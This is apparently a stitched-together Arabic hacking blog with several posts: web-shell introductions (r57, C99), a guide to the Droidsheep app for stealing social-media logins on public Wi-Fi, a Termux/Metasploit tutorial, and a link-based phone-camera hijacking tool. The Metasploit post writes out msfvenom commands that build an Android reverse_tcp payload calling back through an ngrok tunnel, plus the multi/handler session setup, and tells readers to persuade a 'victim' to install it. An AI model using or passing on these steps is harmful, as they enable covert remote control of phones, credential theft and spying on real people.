يمكنك ببساطه تحميل سيرفر اباتشي 2.2 على جهازك الشخصي وهكذا يكون عندك سيرفر من نوع اباتشي او سيرفر ويندوز وهذا السيرفر موجود على سي دي الوندز XP والخدمات العنكبوتيه الي توصلك كلها من السيرفرات
---
مثال على تقنيه الخادم والزبون مثلا انت بدك تتصفح موقع facebook.com طيب اخي هذا موقع فيسبوك موجود على سيرفر اذن انت اعرفت مين الخادم الخادم هو السيرفر والزبون هو انت الان انت كتبت في المتصفح الموقع يتم تحويل الطلب الى السيرفر باستخدام جداول توجيه الشبكات (عباره عن جداول بسيطه تحدد مكان السيرفر) يكون السيرفر ينتطر الطلبات (وظيفته) وعندما يصله طلبك يتاكد من توافره ويرسله لك ويظهر عندك بالمنتصفح والسيرفرات قد تكون بحجم جهازك وقد تكون مخصص لها مبنى كامل خاصه في شركات الاستضافه
قبل لا نرجع لمفهوم الشل بدنا نحكي عن اشي اسمه سكربت هذه الكلمه رح تزهقها من كتر ما رح تسمعها ما هو السكربت هو عباره عن مجموعه من الملفات وقد تكون ملف واحد تثبت على السيرفر وهي ملفات الموقع مثلا منتدى kooora هو عباره عن سكربت vb يحتوي العديد من الملفات واخطرها الملفات الموجوده بمجلد includes مثل ملف confing الموجود فيه بيانات سريه بالمنتدى مثل باسويرد وهيك اشي ما بدي ازي د بلاش تتعقد
.

تعريف الشل :


هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين والسيرفر ويمكنك من خلاله تنفيذ اوامر تمكنك من السيطره التامه على السيرفر
.

استخدامه :


ان الهكر هم اكثر من يستخدمه لكنهم ليسو الوحيدين مطقا فهناك من يستخدمه لامور قريبه من الهكر يسمونه هكر سلمي او هيك اشي

انواع الشلات ولمحه سريعه عنها :

===============
1- webadmin هذا الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين
---
2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه
---
3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.
---
4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
---
5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح
---
6- r57shell الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن ملفات الكونفج (اعتقد اني ذكرتها سابقا)
---
7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
---
8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
---
9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به
---
10- C99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات أوسع ...

ما هي اس كيو ال(SQL) :

===========
هي عباره عن لغه برمجيه تعتمد عليها قواعد البيانات بحيث يكون هناك ملف ترتب من خلاله باقي الملفات الاخرى ويحتوي على اهم المعلومات السريه ايضا.
=====

الجمعة، 5 فبراير 2021

كتاب شرح جميع ادوات الكالى لينكس Kali Linux tools


 

السلام عليكم ورحمة الله وبركاته 

اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء أقدم لكم احد اقوى الكتب فى شرح ادوات الكالى لينكس بالتفصيل 



عدد صفحات الكتاب :- 700 صفحة 

الحجم :-  4 ميجابايت 

صيغتة :- pdf


للمزيد من الكتب اشترك فى قناة التيلجرام 

للاشتراك في التيلجرام اضغط هنا 

لتحميل الكتاب اضغط هنا 


شرح برنامج Droidsheep لإختراق جميع حسابات التواصل الاجتماعي واستخراج اى كلمة مرور




السلام عليكم ورحمة الله وبركاته 



اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء الله سنكمل شرح تطبيقات الاختراق عبر الهاتف الاندرويد 
اليوم هو شرح تطبيق Droidsheep وهو اخطر تطبيق مستخدم فى اختراق حسابات التواصلالاجتماعي 
وسنتعرف ان شاء الله على التطبيق وطريقة تحميله واستخدامه ولكن لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل جديد 

اضغط هنا  للإشتراك فى قناة التيلجرام


لتحميل التطبيق اضغط هنا

طريقة التحميل وتخطى الاعلانات اضغط هنا 



ما هو برنامج Droidsheep

يعتمد البرنامج على احدث التقنيات الحديثة , وافضل التكنولوجيا التي مكنته من الاحتراف في هذا المجال الصعب , والوصول الى كامل التميز , وتحقيق جميع تطلعات المستخدمين المهتمين بهذا النوع من التطبيقات , اي شبكة واي فاي تتصل بها يمكنك اختراق باقي الاجهزة المتصلة بها , مهما كان نوع الشبكة ومدى قوة خصوصيتها وجدار الحماية التي تتمتع به , كل ذلك لن يمثل عائق في اثناء الاستخدام , 

اما عن الهواتف والاجهزة نفسها , هي ايضاً لا يمكنها حماية ذاتها من هذا الاختراق , سوى اذا كان المستهدف للاختراق خبير في الحناية والتأمين , وقام باتباع طرق خاصة لا يعرفها سوى القليل من الاشخاص , كلما اتصل جهاز جديد على الشبكة سيظهر في قائمة المتصلين داخل arp spoofing , نفس الامر عندما تقوم بتغيير الشبكة الحالية , وتسجل دخول الى اخرى فسيتم تحديث المعلومات وعناوين الاي بي , سيظهر بجانب كل جهاز عدة معلومات وتفاصيل وبيانات مختلفة


شرح استخدام البرنامج


استخدام البرنامج سهل للغاية فقط كل ما عليك تثبيته وفتحه وسيبدأ فى عمل مسح شامل على اجهزة المتصله معك على نفس شبكة الواى فاى 
وسيبدأ باظهار عنواين ip الخاصه بهم وعندما تضغط  على اى منهم يبدأ بعرض الحسابات وكلمات المرورالمحفوظة الخاصه بهم
وبتلك الطريقة يمكنك تصييد الكثير من الضحايا عبر شبكات الواى فاى العامة وشبكة المدرسة والجامعه والنادى ... الخ
لكن الرجاء عدم استخدامت لإلحاق الضرر باى احد
والى هنا انتها شرح اليوم ولا تنسى الاشتراك فى قناة التيلجرام 






 

صنع بايلود للإختراق الخارجى وتثبيت جلسة الاختراق عبر Termux والميتاسبلويت Metasploit






السلام عليكم ورحمة الله وبركاته 
اهلا بكم فى موقعنا الإليكترونى اليوم ان شاء الله سنتحدث عن طريقة عمل اختراق خارجى عبر Termux 
فقط تابع القراءة الى النهاية ولا تنسى الاشتراك فى قناة التيلجرام ليصلك كل جديد 

قناة التيلجرام اضغط هنا



ما هو الاختراق الخارجى والداخلى


دائما ما تسمع عن الاختراق الخارجى والداخلى وفتح البورتات وما شابه ذلك 
الإختراق الخارجى لا يحتاج الى فتح بورت او اى شئ لأن عمليه الاختراق تقتصر على الأشخاص المتصلين معك على نفس شبكة الواى فاى وهى من أسهل عمليات الاختراق حيث يمكن ان تتم عبر رقم ip الداخلى او عن  طريق برامج وادوات متخصصه ، ورقم ip الداخلى هو رقم تسلسل جهازك فى خدمة الانترنت والذى يبدأ ب 192.168.0.1 وقد يختلف  على حسب دولتك ويتغير الرقم الاخير على حسب ترتيب جهازك على شبكة الواى فاى حتى ان يصل  الى اقصى حد وهو 192.168.250 


أما عن الاختراق الخارجى هو يتم على اشخاص خارج شبكة الانترنت الخاصه بك 
بشكل اوضح :- مثلا تريد اختراق شخص فى دولة او قرية ثانيه فهذا يسمى اختراق خارجى لانه بالطبع لا يتصل معك على نفس الشبكة .

ويواجه الكثير مشاكل فى اتمام عملية اختراق خارجية وعدم وصول التبليغ وهذا ما جعلهم يظنون ان اتمام عملية اختراق خارجية مستحيلة
حيث يجد على الانترنت شروحات تقول له استخدم no-ip  والبعض يقول له vpn فرنسى وتتضارب الاقوال ولا يتم الاختراق
لكن ان شاء الله سأجعلك قادر على صنع برمجية او بايلود اختراق خارجى



ماذا يلزم لإتمام عملية إختراق ناجحة ؟



1 ) تطبيق Termux 
2 ) تثبيت الحزم الاساسية 
3 ) تثبيت مشروع الميتاسبلويت 
4 ) تثبيت أداة النجروك 
5 ) صنع بايلود اختراق خارجى
6 ) تثبيت جلسة الاختراق

إليك كل شئ جاهز يا صديقى :- 


لتثبيت الحزم الاساسية فى Termux اضغط هنا 


لتثبيت مشروع الميتاسبلويت اضغط هنا

لتثبيت أداة النجروك اضغط هنا



خطوات عمل بايلود إختراق خارجى


أول خطوة تفتح نافذة فى Termux وتكتب الأمر :-  《 ./nrgok tcp 4444 》 وهو أمر فتح أداة النجروك على بورت 4444
ثانى خطوة بعدما تفتح النجروك وتعمل بدون مشاكل افتح نافذة جديدة واكتب أمر فتح الميتاسبلويت :- 《./msfconsole
بعدما تفتح الميتاسبلويت سنبدأ فى صنع بايلود اختراق خارجى الان تابع 

اول شئ اكتب الأمر التالى :

msfvenom -p android/meterpreter/reverse_tcp LHOST=$$$$$$ LPORT=@@@ R > /sdcard/×××××××××.apk



ولكن ستقوم بالتعديل عليه حيث :-   ستضع مكان علامة ×××××× اسم البايلود 
وستذهب الى اداة المجروك لجلب البورت والهوست الخارجى منها كما يلى 






ستحذف علامة $$$$$$ وتضع مكانها الهوست الخاص بك وستجده فى صفحة النجروك كما هو  موضح فى المستطيل البرتقالى

وستحذف علامة @@@@ وتضع مكانها رقم البورت الموجود فى النجروك وليس الذى فتحته انت وتجده كما هو موضح فى المربع الأخضر

بعد ذلك قم بادخال الامر وسيتم صنع البايلود وتنزيله فى الذاكرة الداخليه لجهازك 

الآن حان  وقت فتح جلسة الاختراق لكن كيف ؟
اعلان ٤٤٤٤٤

فتح جلسة الاختراق :-


بعد صنع البايلود ستتوجه مجددا الى صفحة الميتاسبلويت وكتابة الاوامر بالترتيب:- 

الامر الاول :-
use exploit/multi/handler

الأمر الثانى :-

set payload android/meterpreter/reverse_tcp

الأمر الثالث :-
set lport 4444

الأمر الرابع :- 

set lhost localhost

الأمر الخامس :- 
exploit

بعد ذلك سترسل البايلود الى الضحية واقناعه بالضغط عليه وتثبيته
وبعد ذلك ستجد ان جلسة الاختراق قد فتحت امامك Metetpreter
أما عن اوامر التحكم تجدها فى أسفل المقال
ولكن قد تواجهك مشاكل فى أن جلسة الاختراق تتوقف تلقائيا بعد مرور 30 ثانية لذلك يجب تثبيتها
يمكن الذهاب لطريقة تثبيت الجلسة عبر الرابط فى اسفل المقال


لتحميل أوامر التحكم فى جلسة الاختراق اضغط هنا


كيفية تثبيت جلسة الاختراق اضغط هنا


كان معكم ديفل يونكس DEVIL UNEX 
لا تنسى مشاركة الموضوع فضلا منك ودعمنا فى قناة التيلجرام ليصلك كل جديد 

للإشتراك فى التيلجرام اضغط هنا






    



    
    
    
    
    
    

الثلاثاء، 2 فبراير 2021

أداة جديدة وقوية لإختراق كاميرات الهواتف عن طريق رابط فقط Termux



السلام عليكم ورحمة الله وبركاته 
اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء الله اقدم لكم شرح جديد فى دورة تعلم اختراق الكاميرات
شرح اداة جديدة وبدون اى مشاكل 
ولكن يوجد بعض المستلزمات لاتمام عملية اختراق ناجحة
قناتنا فى التيلجرام اضغط هنا


المستلزمات :- 

1 ) تثبيت تطبيق Termux 
2 ) تثبيت الحزم الاساسية 
3 ) تثبيت اداة النجروك Ngrok 
4 ) تثبيت اداة اختراق الكاميرا وبدء العمل

الخطوات :-


يمكنك تثبيت تطبيق  Termux عبر متجر جوجل بلاى

لتثبيت الحزم الاساسية اضغط هنا


لتثبيت اداة النجروك اضغط هنا


لتحميل أوامر تثبيت الاداة اضغط هنا

طريقة التحميل وتخطى الاعلانات اضغط هنا 

الان بعدما تقوم بتثبيت اوامر الاداة وفتحها ستقوم بصنع رابط وارساله للضحية وطلب منه فتح الرابط ومن ثم تبدأ الأداة بالتقاط صور له وارسالها لك

طريقة استخدام الاداة سهله جدا وسبق ان قمت بشرح أداة مشابها لها فى الاستخدام


سيتم تحويل الى مقال عن اختراق الكاميرا لكن  الاختلاف فى اوامر الاداة الفقط ولكن طريقة الاستخدام واحده



لا تنسى الاشتراك في قناة التيلجرام

 اضغط هنا 

شرح وتحميل برنامج ANDRAX مختبر الإختراق الأخلاق يوفر لك توزيعات اللينكس على هاتفك




السلام عليكم ورحمة الله وبركاته 

اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء الله سنشرح لكم برنامح  ANDRAX 

سابقا قمنا بنشر 25 تطبيق للاختراق عبر الهاتف وكان تطبيق ANDRAX احدهم ووعدنا المتابغين الكرام ان نشرح كل يوم واحد منهم 

وونتقل سريعا الى شرح التنزيل والاستخدام 


 

برنامج ANDRAX





ANDRAX هو نظام أساسي لاختبار الاختراق تم تطويره خصيصًا للهواتف الذكية التي تعمل بنظام Android ويعمل على هواتف اصدار 5 فما فوق ، ويعمل بكل سهولة على الهواتف ويتصرف مثل توزيعة لينكس Linux  

ويتطلب لتنزيل التطبيق ان يكون لديك مساحه 4 جيجا فارغه على الهاتف وايضا روت root  وبعدما تقوم بتنزيله وتثبيت الحزم فسترى ان طريقة العمل بسيطه جدا وسهله والمميز ان هذا التطبيق يحتوى على أكثر من 700 اداة تستخدم فى الاختراق والهجوم وجمع المعلومات والفحص وما شابه ذلك وايضا يوجد بداهلة بيئة برمجة حيث يمكنك برمجة سكريبتات وادوات خاصه


أهم أدوات تطبيق ANDRAX للاندرويد


أدوات Packet Crafting

Hping3
Nping
Scapy
Hexinject
Ncat
Socat

أدوات Wireless Hacking

VMP Evil AP
Aircrack-NG Tools
Cowpatty
MDK3
Reaver

أدوات Information Gathering

Whois
Bind DNS tools
Dnsrecon
Raccoon
DNS-Cracker
Firewalk

أدوات Scanning

Nmap – Network Mapper
Masscan
SSLScan
Amap

أدوات Network Hacking

ARPSpoof
Bettercap
MITMProxy
EvilGINX2

أدوات Password Hacking

Hydra
Ncrack
John The Ripper
CRUNCH

أدوات WebSite Hacking

0d1n
Wapiti3
Recon-NG
PHPSploit
Photon
XSSer
Commix
SQLMap
Payloadmask
AbernathY-XSS


لتحميل التطبيق اضغط هنا

للإشتراك فى قناة التيلجرام اضغط 




صور من داخل التطبيق



























اعتذر لأنى لم استطع شرح التطبيق عمليا لانى لا امتلك روت على جهازى 
يمكنكم البحث على النمصات عن شرح تطبيق ANDRAX 





لشرح 25 تطبيق للاختراق عبر الهاتف اضغط هنا